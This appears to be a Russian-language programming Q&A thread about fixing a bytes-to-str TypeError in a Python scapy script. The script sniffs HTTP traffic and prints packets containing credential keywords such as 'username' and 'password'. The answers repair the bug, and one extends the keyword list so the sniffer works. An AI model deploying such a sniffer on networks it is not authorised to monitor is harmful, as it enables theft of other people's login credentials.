# Ошибка TypeError: can only concatenate str (not "bytes") to str

Tags: python, python-3.x, python-2.x, python-2.7, строки

```
import scapy.all as scapy
from scapy.layers import http


def sniff(interface):
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


def get_url(packet):
    return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path


def get_login_info(packet):
    if packet.haslayer(scapy.Raw):
        load = packet[scapy.Raw].load
        keywords = ["username", "user", "login", "password", "pass"]
        for keyword in keywords:
            if keyword in load:
                return load


def process_sniffed_packet(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print("[+] HTTP Request >>" + url)

        login_info = get_login_info(packet)
        if login_info:
            print("\n\n[+] Possible username/password > " + login_info + "\n\n")


sniff("eth0")
```

Comment: Вероятно `get_login_info` возвращает bytes. Попробуйте обернуть `login_info` в `str()` внутри `print` примерно так:  `print("\n\n[+] Possible username/password > "+str(login_info)+ "\n\n")`
Так-же сейчас в python есть f-string : 
`print(f'\n\n[+] Possible username/password > {str(login_info)}\n\n)`

Comment: Не помогло, ничего не выводит после запуска.

Comment: значит у вас bytes надо раскодировать в строку - тогда `login_info.decode()`

Answer (score 0):

Ошибка означает, в переменной после оператора конкатинации байты.

Перекодируйте их в строчное значение:

```
s = 'abc'
b = 'def'.encode()
type(b) # bytes

print(s + b)
----> 1 print(s + b)

TypeError: must be str, not bytes

print(s + b.decode()) # abcdef
```

Comment: Здравствуйте, не могли бы более подробно объяснить в какой элемент кода это вписать?

Comment: Там где у вас ошибку выдает, смотрите трейсы, там стоит в какой строке кода и какая команда. В примере выше показал же.

Comment: Увы, не помогло, спасибо за совет.

Comment: А что вы сделали, что оно не помогло. Если ничего, то оно и не поможет.

Answer (score 0):

Попробуй переписать функцию так:

```
def get_login_info(packet):
        if packet.haslayer(scapy.Raw):
            load = packet[scapy.Raw].load
            keywords_list = ["username", "name", "user", "usr", "email", "mail", "login", "password", "pass", "pwd", "passwd"]
            keywords = [x.encode() for x in keywords_list]
            for keyword in keywords:
                if keyword in load:
                    return load
```

Должно всё заработать